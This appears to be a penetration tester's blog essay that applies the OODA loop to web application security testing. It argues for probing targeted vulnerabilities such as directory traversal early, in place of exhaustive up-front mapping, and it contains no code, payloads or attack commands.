Where ever you put your mind, there you are. – K. Slatoff
The world around you is complex, rich, and quite frankly a bit overwhelming if you tried to take it all in at once. So much in fact, that your brain can’t make sense of all of it at once. The very process of trying to observe/analyze the world, takes you away from the experience and filters out much of what is there. Focus causes other things to be ignored because it’s so much more than we can handle. Luckily– we don’t generally have to.
The bits and pieces that we actually focus in on give us what we need to decide what needs to happen next. This is the natural premise that John Boyd outlines with his OODA loop. We experience the world through this process of pulling in intel, figuring out what needs focus, deciding what to do and then acting upon it. Often the action we take is to obtain supplemental information allowing for better insight to decide and to act against. The military, especially the Marine corps, have invested a huge amount of effort and strategy around this OODA concept. It’s the heart blood of maneuverability warfighting.
For me, I’ve been trying to extract the principles and concepts of this warfighting methodology into my work. I’ve been retooling my testing approach to be more rapid, strategic, and natural. I’ve already discussed how certain targets make more sense from a breaching perspective, but I’ve also recently come to believe that most information collected outside of those targets isn’t tremendously useful. In fact, though some might call this heresy, I think most methodology I’ve reviewed is tremendously flawed as it pertains to information gathering. It seems that nearly all approaches suggest this massive up front effort, and then wants you to weed your way through it to discern what is vulnerable. The waterfall approach works only in limited scenarios for building software, not sure why we think it’d work for testing it.
“The purpose of analysis is not to understand the universe, but to direct you toward focused action” – flawless consulting
Consider then how your body works naturally. If you flood it with too much information, you can’t act against it. You quickly become overloaded with noise which distracts you from being able to orient, decide and act against it. Yet most methodologies point you to some form of “application mapping.” On the surface, having a collection of every single possible fuzzable parameter seems enticing. But in reality– what do you plan on doing with that list? Would it make sense to turn on every tv in your home, every radio, and try to listen to a single song? With out any context, how could you possibly know which of those parameters are control points? With out any context, are you really planning on throwing every single payload in fuzzdb against it? Without context, how would you be able to tell if a simple modification to those payloads would make all the difference? The short answer is you can’t, or at least not very well. Some people call this thorough… I think it’s mostly an expensive waste of time.
What if I instead started a test by focusing on one strategic vulnerability, directory traversal. I like start here because if I can accomplish this, I have the potential for turning the test into an involuntary code review. I would no longer need a kitchen-sink extraction of all data– I merely want to answer three questions: where, how, and if it’s vulnerable. For the where of it, I’d hunt for file upload and download functionality. I’d look for how files are served, especially around dynamic content. Then I would move on to testing out the component’s “happy path”– what should this component normally do. After watching the successful flow of a handful of pages, I should have enough of “how” to start testing abuse cases. I’d focus first on tests to see how different input is handled, and watch how the application behaves to unexpected things. Each test I do provides me with answers I needed to move from one stage to the next to the next. Everything has a functional, pragmatic purpose– no wasted movement.
If directory traversal didn’t exist– so what? I’ve still learned a great deal about the application and how it works. Because I was gathering information as I went along, that information can be re-applied to the next attack– maybe SQL injection– which would also teach me more about the application. I continue through my direct breaching points, because they might allow me to shortcut solving my visibility issue, until I am done. Even if they all failed, I bet I’d end up with more concrete understanding of how the application works than if I had gone the other route.
I’d also bet that most people naturally gravitate toward this. Though, from an academic perspective, other approaches seem well thought out– in practice I have found them to be stifling and often wasteful. Fortunately I get to dogfood my concept every day– and I can say the benefits have been very useful. Starting with tests that immediately affect the system gives you initiative and concrete experience. If they are successful, they give you visibility not otherwise possible. Using a natural strategy designed NOT to overwhelm your mind is also pretty great too. Working exploits teach you so much about an application– so why not streamline your approach to them?
One last thought– even in one of the best dossier’s I’ve seen put together on attacking a specific site– the focus was only on gathering information relevant toward specific actionable attacks. The other information was irrelevant toward that goal, and subsequently not-needed.
Food for thought.